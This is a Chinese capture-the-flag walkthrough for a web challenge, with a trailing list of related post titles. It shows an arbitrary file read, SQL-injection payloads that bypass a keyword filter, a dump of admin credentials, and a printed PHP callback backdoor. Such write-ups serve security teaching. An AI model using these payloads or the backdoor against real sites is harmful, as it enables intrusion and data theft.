http://cms.nuptzj.cn/

题解:

MzAzMTY3YWQxZDlmZmUyNGIxOWNjZWI1OWY4NzA3ZmU=

base64解密

303167ad1d9ffe24b19cceb59f8707fe

md5解密

undefined

 能点的都点一遍以后

 CMS说明的URL

http://cms.nuptzj.cn/about.php?file=sm.txt

访问

http://cms.nuptzj.cn/sm.txt

存在config.php,index.php,passencode.php,say.php五个文件

admin的表结构(可能存在SQL注入)

从URL

http://cms.nuptzj.cn/about.php?file=sm.txt

可知,存在文件包含

可以获取网站文件

获取所有已知文件

about.php

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php $file=$_GET['file']; if($file=="" || strstr($file,'config.php')){ echo "file参数不能为空!"; exit(); }else{ $cut=strchr($file,"loginxlcteam"); if($cut==false){$data=file_get_contents($file); $date=htmlspecialchars($data); echo $date; }else{ echo "<script>alert('敏感目录,禁止查看!但是。。。')</script>"; } }

存在文件loginxlcteam

访问

http://cms.nuptzj.cn/loginxlcteam/

发现是后台

用户名、密码未知

返回index.php

有留言搜索功能,可能存在数据库查询

直接使用功能

审查元素

发现文件so.php

下载so.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>搜索留言</title>
</head>
<body> <center> <div id="say" name="say" align="left" style="width:1024px">
<?php if($_SERVER['HTTP_USER_AGENT']!="Xlcteam Browser"){ echo '万恶滴黑阔,本功能只有用本公司开发的浏览器才可以用喔~'; exit(); } $id=$_POST['soid']; include 'config.php'; include 'antiinject.php'; include 'antixss.php'; $id=antiinject($id); $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error()); mysql_select_db($db_name,$con); $id=mysql_real_escape_string($id); $result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id"); $rs=mysql_fetch_array($result); echo htmlspecialchars($rs['nice']).':<br/>&nbsp;&nbsp;&nbsp;&nbsp;'.antixss($rs['say']).'<br />'; mysql_free_result($result); mysql_free_result($file); mysql_close($con);
?> </div> </center>
</body>
</html>

发现antiinject.phpantixss.php两个文件

antiinject.php

<?php function antiinject($content){ $keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); $info=strtolower($content); for($i=0;$i<=count($keyword);$i++){$info=str_replace($keyword[$i], '',$info); } return $info; }
?>

作用:防止SQL注入

antixss.php

<?php function antixss($content){ preg_match("/(.*)\[a\](.*)\[\/a\](.*)/",$content,$url); $key=array("(",")","&","\\","<",">","'","%28","%29"," on","data","src","eval","unescape","innerHTML","document","appendChild","createElement","write","String","setTimeout","cookie");//因为太菜,很懒,所以。。。(过滤规则来自Mramydnei) $re=$url[2]; if(count($url)==0){ return htmlspecialchars($content); }else{ for($i=0;$i<=count($key);$i++){ $re=str_replace($key[$i], '_',$re); } return htmlspecialchars($url[1],ENT_QUOTES).'<a href="'.$re.'">'.$re.'</a>'.htmlspecialchars($url[3],ENT_QUOTES); } }
?>

作用:预防XSS攻击

antiinject.php

过滤了敏感词,可以用双重绕过

过滤了空格,可以用/**/绕过

SQL语句源代码

$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");

SQL注入

soid=1/**/UNunionION/**/SELselectECT/**/1,2,3,4

其中

USER-AGENT=Xlcteam Browser

SQL注入

soid=1/**/an=d/**/0/**/unio=n/**/selec=t/**/null,usernam=e,userpas=s,null/**/fro=m/**/admi=n

passencode.php

<?php function passencode($content){ $pass=urlencode($content); $array=str_split($content); $pass=""; for($i=0;$i<count($array);$i++){ if($pass!=""){ $pass=$pass." ".(string)ord($array[$i]); }else{ $pass=(string)ord($array[$i]); } } return $pass; }
?>

作用:将用户输入的密码存储为ASCII码的形式

[102 ,117 ,99 ,107 ,114 ,117 ,110 ,116 ,117]转换[fuckruntu]

 用户名:admin    密码:fuckruntu

登录

xlcteam.php

<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, '');
?>

回调后门

获取文件目录

flag

CG CTF WEB 综合题2相关推荐

  1. CG CTF WEB 综合题

    http://teamxlc.sinaapp.com/web3/b0b0ad119f425408fc3d45253137d33d/index.php 题解: [][(![]+[])[!![]+!![] ...

  2. CG CTF WEB 这题不是WEB

    http://chinalover.sinaapp.com/web2/index.html 题解: 下载图片 记事本方式打开

  3. CG CTF WEB 签到题

    http://chinalover.sinaapp.com/web1/ 题解: 审查元素 注释

  4. CG CTF web 上

    签到题 打开f12查看源代码得到flag md5 collision 把变量md51,md5加密后得到 0e830400451993494058024219903391 当成科学计算法,0的无论多少次 ...

  5. CG CTF WEB SQL注入2

    http://4.chinalover.sinaapp.com/web6/index.php 题解: <html> <head> Secure Web Login II < ...

  6. CG CTF WEB SQL注入1

    http://chinalover.sinaapp.com/index.php 题解: <html> <head> Secure Web Login </head> ...

  7. 南邮CTF - Web - 这题不是WEB

    题目来源:南京邮电大学网络攻防训练平台 题目链接:http://chinalover.sinaapp.com/web2/index.html 解题过程:这个题目...点开一看,我笑了,这是啥呀?猫咪吃 ...

  8. CG CTF WEB MYSQL

    http://chinalover.sinaapp.com/web11/ 题解: 题目提示robots.txt,首先访问http://chinalover.sinaapp.com/web11/robo ...

  9. CG CTF WEB AAencode

    http://homura.cc/CGfiles/aaencode.txt 题解: ゚ω゚ノ = /`m´)ノ ~┻━┻ / /*´∇`*/ ['_']; o = (゚ー゚) = _ = 3; c = ...

最新文章

  1. 黯然微信小程序杂记(二):小程序最新版登录并进行缓存模块的实现 附源码
  2. 唱《醉赤壁》表白成功!跨越太平洋的爱情没有时差,东八区与西八区同步奔跑
  3. mysql采用 级触发_Mysql高级之触发器(trigger)
  4. Nginx 多进程连接请求/事件分发流程分析
  5. 计算机专业英语词汇mp3,【听单词】计算机专业英语词汇音频106,计算机英语单词MP3...
  6. 码农你会搜“Win10 破解版”吗?
  7. 内存映射与DMA笔记
  8. 【转载】 vs2005视频教程 之 抽象类和接口 四 [视频]
  9. Python_collections_Counter计数器部分功能介绍
  10. matlab2009安装教程
  11. 音频插件使用(wavesurfer.js)
  12. 计算机硬件与哪些部分组成部分,计算机硬件组成及各部分功能有哪些?
  13. mac安装php+mysql数据库_Mac环境下Nginx+PHP+MySQL的安装与配置
  14. banne图怎么设计才会有更多的点击率
  15. 浏览器实现pdf下载、ms http下载、IE不兼容
  16. (Java)学习笔记1---入门篇
  17. poi操作word替换模板向指定位置添加图表
  18. Java构造方法以及构造方法的重载
  19. Chipmunk-js物理引擎学习笔记
  20. 趋势外推预测 这一篇就够了(附上例题)~~~~~~~~~~~

热门文章

  1. 使用read_html爬取网页表哥,Python笔记:用read_html()爬取table形式表格的网络数据...
  2. mysql错误1300怎么解决_pt-osc 变更时遇到 “MySQL error 1300” 报错问题解决
  3. c++代码好玩_Py之pygame:有趣好玩—利用pygame库实现鱼儿自动实时目标跟踪(附完整代码)...
  4. python判断是否是英文字母_用python如何判断字符串是纯英文
  5. 手机刷的面具是什么_从刷入到跑路-Magisk(面具)刷入使用教程
  6. VSCode注册关联自定义类型文件
  7. mysql配置读写分离无效_MySQL数据库的同步配置+MySql 读写分离
  8. 我的Java教程,不断整理,反复学习,记录着那些年大学奋斗的青春
  9. 【机器学习算法专题(蓄力计划)】二、机器学习中的统计学习方法概论
  10. 二十四、深入Python多线程和多进程